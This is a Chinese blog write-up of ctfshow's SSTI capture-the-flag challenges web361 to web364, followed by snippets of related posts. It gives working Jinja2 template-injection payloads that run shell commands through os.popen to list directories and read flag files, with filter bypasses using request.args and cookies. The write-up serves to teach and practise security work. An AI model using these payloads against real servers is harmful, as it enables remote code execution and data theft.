ctfshow-SSTI

最新推荐文章于 2024-07-25 12:31:23 发布

ing_end

最新推荐文章于 2024-07-25 12:31:23 发布

阅读量946

点赞数

分类专栏：笔记文章标签： python 前端开发语言

本文链接：https://blog.csdn.net/ing_end/article/details/124638252

版权

SSTI

web361

payload：

?name={
  { config.__class__.__init__.__globals__['os'].popen('ls').read() }}

?name={
  { config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}

之后打开

?name={
  { config.__class__.__init__.__globals__['os'].popen('cat ../flag').read() }}

得到flag

web362

payload同上

web363

题中过滤了引号

使用request.args绕过

如果要构造

?name={
  { config.__class__.__init__.__globals__['os'].popen('cat ../flag').read() }}

但是引号不能使用了，就可以把这两处使用引号的地方替换掉，最终变成

?name={
  { config.__class__.__init__.__globals__[request.args.a].popen(request.args.b).read() }}&a=os&b=cat ../flag

也就是上面的 ‘os’ 可以写为 request.args.a&a=os

?name={
  { config.__class__.__init__.__globals__[request.args.a].popen(request.args.b).read() }}&a=os&b=cat ../flag

web364

此题在363关的基础上过滤了args

request.args是GET传参，可以使用其他方式来代替args，eg:cookie

?name={
  {url_for.__globals__[request.cookies.a][request.cookies.b](request.cookies.c).read()}}

Cooki

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

ing_end

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

CTFshow-SSTI

Leo8283的博客

04-25

591

在CTFWEB入门的路上一直感恩有这么多大佬博文帮忙第一步了解了ssti是个什么东西，做题时就要看大佬的解题博客，比较清晰能串联知识点 CTFshow做题 ssti做题逻辑测试：name={{1%2b1}} %2b是加号，不能用+，一定要编码，因为+在url中会被当做空格存在ssti：查看当前类：{{''.__class__}} 查看当前类的所属类：{{''.__class__.__bases__}} 或者类的解析顺序{{''.__class__.__mro__}} 找到object基类

2024年网安最新ctfshow web入门 SSTI

2401_84297796的博客

05-03

494

返回一个包含Python中所有类的列表，这些类都是直接或间接从。选择了列表中的第133个元素（因为索引是从0开始的）。它将arg过滤掉了，所以没有办法直接GET传参。但是传参会自动补齐双引号，所以索性不加了。轮流试试每个数字，发现只有2和3被过滤。经过各种字母和符号尝试，发现会过滤“”属性，可以获得一个字典，其中包含。类的基类列表，其中第一个元素是。命令，这个命令通常用于读取名为。类定义时可用的所有全局变量。试试把“”进行url编码看看。提示“名字就是考点”使用全角数字进行绕过。关闭使用半角输入模式。

参与评论您还未登录，请先登录后发表或查看评论

CTF ssti注入（二）绕过

最新发布

2301_81040377的博客

07-25

1061

这两者差不多。

CTFSHOW-SSTI

Monica的博客

11-12

5445

参考文章 SSTI模板注入绕过（进阶篇）_羽的博客-CSDN博客_ssti绕过

ctfshow--SSTI

qq_51684648的博客

03-15

661

ctfshow–SSTI 361、 {{7*‘7’}}回显是7777777，判断是jinjia2模板。 {{''.__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /f*').read()}} ''.__class__.mro__[1].__subclasses__()查看object下的所有子类集合。 362、在__builtin__中有众多的可用函数，包括eval 1: ?name={{ur

ctfshow-web365(SSTI)

m0_62094846的博客

05-05

600

这次是把args [ 和' 过滤了有两种方式可以绕过[ 可以用__getitem__和pop代替，因为pop会破坏数组的结构，所以更推荐用__getitem__ ?name={%set+chr=[].__class__.__bases__[0].__subclasses__()[80].__init__.__globals__.__builtins__.chr%}{{[].__class__.__base__.__subclasses__()[132].__init__.__globals__

ctfshow-web364(SSTI)

m0_62094846的博客

04-30

805

用上题的方法，发现还是有东西被过滤了筛选后发现是args 过滤了引号和args,上题的姿势不能用了，但是可以用chr()函数绕过。可以用这个payload判断chr()函数的位置： {{().__class__.__bases__[0].__subclasses__()[§0§].__init__.__globals__.__builtins__.chr}} 用bp跑后发现有这几个，可以任意取取80 分析一下别人的wp(现在的水平也只能这样了) ?name={%...

CTFshow SSTI

starttv的博客

11-21

1033

模板引擎（这里特指用于Web开发的模板引擎）是为了使用户界面与业务数据（内容）分离而产生的，它可以生成特定格式的文档，利用模板引擎来生成前端的html代码，模板引擎会提供一套生成html代码的程序，然后只需要获取用户的数据，然后放到渲染函数里，然后生成模板+用户数据的前端html页面，然后反馈给浏览器，呈现在用户面前。模板引擎也会提供沙箱机制来进行漏洞防范，但是可以用沙箱逃逸技术来进行绕过。SSTI 就是服务器端模板注入（Server-Side Template Injection）

CTFshow——SSTI

D.MIND 的博客

03-06

2452

首先一定要了解有关python类的知识： python __base__等内置方法 python inspect模块解析 # coding=utf-8_ _author__ = "leaves" class Base(object): a = 0 def __init__(self): self._a = 10 pass class Child(Base): "测试测试" _b = 10 def __str__(

ctfshow-ssti

weixin_74660472的博客

04-18

470

ssti漏洞原理ssti服务端模板注入，ssti主要为python的一些框架 jinja2 mako tornado django，PHP框架smarty twig，java框架jade velocity等等使用了渲染函数时，由于代码不规范或信任了用户输入而导致了服务端模板注入，模板渲染其实并没有漏洞，主要是程序员对代码不规范不严谨造成了模板注入漏洞，造成模板可控。本文着重对flask模板注入进行浅析。morePython对象的继承，用魔术方法一步步找到可利用的方法去执行。即找到父类。

CTFSHOW SSTI篇

羽的博客

01-08

6697

文章目录web361web362web363web364web365web366、367web368web369web370web371web372 建议大家先看下笔者之前写的模板注入的文章 web361 payload name={{().__class__.__mro__[-1].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}} web362 payload ?name={{x.__init__.__glo

ctfshow web入门 SSTI

2301_79442654的博客

03-16

385

返回一个包含Python中所有类的列表，这些类都是直接或间接从。选择了列表中的第133个元素（因为索引是从0开始的）。属性，可以获得一个字典，其中包含。类的基类列表，其中第一个元素是。命令，这个命令通常用于读取名为。类定义时可用的所有全局变量。从全局变量字典中获取名为。提示“名字就是考点”

CTFSHOW SSTI入门

v2ish1yan的博客

09-02

699

ssti入门题

ctfshow ssti注入

pwfortune的博客

04-01

656

可以通过十六进制编码的方式进行绕过 __ : {{()["\x5f\x5fclass\x5f\x5f"]}} ={{().__class__}}（有点奇怪，values 是可以post 传参的，但是这里post传参后会报错，之后再去get传参也会报错，想要关了之后重新打开，去get传参）过滤了 {{ ,其他同web367 ,稍微改一下，{{}} ==> {%print()%}过滤了下划线__ , 引号 ,args , [] , os。过滤了引号,argsaa。

CTFSHOW、SSTI模块

RealIiikun的博客

03-10

566

ctfshow_ssti模块

ctfshow ssti

07-27

CTFShow SSTI（Server-Side Template Injection）是一个与安全相关的话题，它涉及到服务器端模板注入漏洞。在某些情况下，当应用程序接受用户输入并将其作为模板的一部分进行解析时，攻击者可以利用这个漏洞来执行任意代码或获取敏感信息。在CTF（Capture The Flag）比赛中，SSTI是一类常见的漏洞类型。攻击者可以通过构造特定的输入来绕过应用程序的过滤机制，成功注入恶意代码，从而导致服务器端执行该代码。为了防止SSTI漏洞，开发人员应该谨慎处理用户输入，并在解析模板时使用安全的方法，如使用模板引擎提供的过滤器或转义函数。此外，安全审计和代码审查也是发现和修复SSTI漏洞的重要步骤。如果你对SSTI漏洞有更具体的问题或需要进一步的解释，请告诉我。